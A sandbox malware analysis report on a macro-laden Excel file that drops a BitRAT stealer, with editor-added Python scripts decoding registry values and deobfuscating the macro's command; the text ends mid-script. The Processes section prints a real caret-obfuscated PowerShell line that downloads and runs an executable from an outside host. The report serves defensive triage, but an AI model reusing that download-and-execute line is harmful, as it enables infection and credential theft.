Malware Analysis Report

2025-01-03 05:28

Sample ID 230918-wzbejaea23
Target RomaniaRequestImunSRL092023_JC.xls
SHA256 896dd0f8a116edbf4f54be7fac310410467043ecbd86b2d4d66089f14bde6d01
Tags
macro macro_on_action bitrat xenarmor collection password recovery spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

896dd0f8a116edbf4f54be7fac310410467043ecbd86b2d4d66089f14bde6d01

Threat Level: Known bad

The file RomaniaRequestImunSRL092023_JC.xls was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action bitrat xenarmor collection password recovery spyware stealer trojan upx

Process spawned unexpected child process

XenArmor Suite

BitRAT

Suspicious Office macro

Downloads MZ/PE file

Blocklisted process makes network request

Office macro that triggers on suspicious action

Executes dropped EXE

Reads data files stored by FTP clients

Loads dropped DLL

Reads local data of messenger clients

UPX packed file

ACProtect 1.3x - 1.4x DLL software

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Accesses Microsoft Outlook accounts

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Program crash

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Enumerates system info in registry

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-18 18:21

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-18 18:21

Reported

2023-09-18 18:23

Platform

win7-20230831-en

Max time kernel

117s

Max time network

120s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RomaniaRequestImunSRL092023_JC.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
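The "Set value (data)" rows in this table and in the "Modifies Internet Explorer settings" table above carry long hex strings that the sandbox prints without decoding. They are UTF-16LE text. The following is an added example by the editor, not part of the sandbox report: it decodes the three distinct blobs copied from the rows above and checks their shape against the Windows Installer (Darwin) descriptor layout, twenty characters of compressed product GUID, a feature name, ">", twenty characters of compressed component GUID, then the program arguments. The compressed GUIDs are left as written; only the structure is parsed. Treating them as installer descriptors is the editor's reading of the data; it is supported by the plain command values on the neighbouring rows (WINWORD.EXE /n "%1", msohtmed.exe /p %1) and by the /dde switch in the behavioral1 command line, which is how the shell's Open verb starts Excel.

```python
"""Decode the UTF-16LE 'command' blobs from the report's registry rows and check
whether they are Windows Installer (Darwin) descriptors rather than attacker commands."""
from __future__ import annotations
from dataclasses import dataclass

# Hex dumps copied verbatim from the report's "Set value (data)" rows.
# Default MHTML Editor\shell\edit\command and .mht OpenWithList\Microsoft Word:
WORD_BLOB = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000"
# .mht and .htm OpenWithList\Excel.exe and \Microsoft Excel:
EXCEL_BLOB = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000"
# .htm and .mht OpenWithList\MSPub.exe:
PUB_BLOB = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000"


@dataclass(frozen=True)
class DarwinCommand:
    product: str    # 20-char compressed product GUID (kept as written, not expanded here)
    feature: str    # MSI feature name, e.g. WORDFiles
    component: str  # 20-char compressed component GUID
    args: str       # program arguments appended after the descriptor


def decode_registry_text(hex_blob: str) -> str:
    """The sandbox dumps the value as hex of UTF-16LE text; drop the terminating NULs so the
    result can be compared with the plain 'command\\' default values on the same rows."""
    return bytes.fromhex(hex_blob).decode("utf-16-le").rstrip("\x00")


def parse_darwin_command(text: str) -> DarwinCommand | None:
    """Split '<product(20)><feature>><component(20)> <args>'. Return None for anything
    else, e.g. a real file path, which is what an attacker-set command would look like."""
    descriptor, _, args = text.partition(" ")
    product, body = descriptor[:20], descriptor[20:]
    feature, sep, component = body.partition(">")
    if len(product) != 20 or not feature or not sep or len(component) != 20:
        return None
    return DarwinCommand(product, feature, component, args)


def triage_blob(hex_blob: str) -> dict:
    """Decode one blob and flag whether it is installer self-repair metadata."""
    text = decode_registry_text(hex_blob)
    cmd = parse_darwin_command(text)
    return {"text": text, "darwin": cmd, "installer_repair": cmd is not None}


if __name__ == "__main__":
    for blob in (WORD_BLOB, EXCEL_BLOB, PUB_BLOB):
        print(triage_blob(blob))
```

All three blobs share the same product prefix and differ only in the feature (WORDFiles, EXCELFiles, PubPrimary), component and arguments (/n "%1", /dde, %1), which is Office re-registering its own HTML and MHTML handlers when it starts. These rows therefore do not carry attacker indicators; the ones that do are in the Processes list and in the later behavioral2 tables.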

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RomaniaRequestImunSRL092023_JC.xls

C:\Windows\SysWOW64\cmd.exe

cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/qyAOUa1rJz/Betro.e^xe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell /W 01 curl https://transfer.sh/get/qyAOUa1rJz/Betro.exe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe
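The cmd.exe line above is the stage the macro actually runs: carets are cmd's escape character and are stripped before the child is started, and cmd ends the program name at "/", so "pow^ers^hell/W 01" becomes powershell.exe with "/W 01" as its first arguments (the powershell.exe line the sandbox recorded is exactly that). Inside Windows PowerShell, curl is an alias for Invoke-WebRequest and -o binds to -OutFile, and -WindowStyle accepts the numeric ProcessWindowStyle value, so 01 is Hidden. The following is an added example by the editor, not part of the sandbox report: it removes the escapes, normalises the program name, and extracts the URL, drop path and the statement executed after the download from the recorded command line.

```python
"""Recover the PowerShell download cradle hidden behind cmd.exe caret escapes and pull
the indicators out of it."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# cmd.exe command line as recorded in behavioral1 (copied from the report's Processes list).
RAW_CMDLINE = (
    r"cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/qyAOUa1rJz/Betro.e^xe"
    r" -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe"
)

# powershell.exe -WindowStyle accepts the numeric System.Diagnostics.ProcessWindowStyle value.
WINDOW_STYLES = {0: "Normal", 1: "Hidden", 2: "Minimized", 3: "Maximized"}


@dataclass
class Cradle:
    command: str                 # what 'cmd /c' actually launches, escapes removed
    program: str                 # first token of that command
    window_style: Optional[str]  # decoded -WindowStyle, if present
    url: Optional[str]           # remote payload
    out_path: Optional[str]      # where it is written (-o binds to Invoke-WebRequest -OutFile)
    executes: list[str] = field(default_factory=list)  # statements run after the download


def strip_cmd_escapes(cmdline: str) -> str:
    """Undo cmd.exe's escape character: outside double quotes, '^x' is just 'x'."""
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "^" and not in_quotes and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 2
            continue
        out.append(ch)
        i += 1
    return "".join(out)


def inner_command(cmdline: str) -> str:
    """Return the string 'cmd /c' hands to CreateProcess. cmd terminates the program name at
    '/', so 'powershell/W 01' starts powershell.exe with '/W' as its first argument."""
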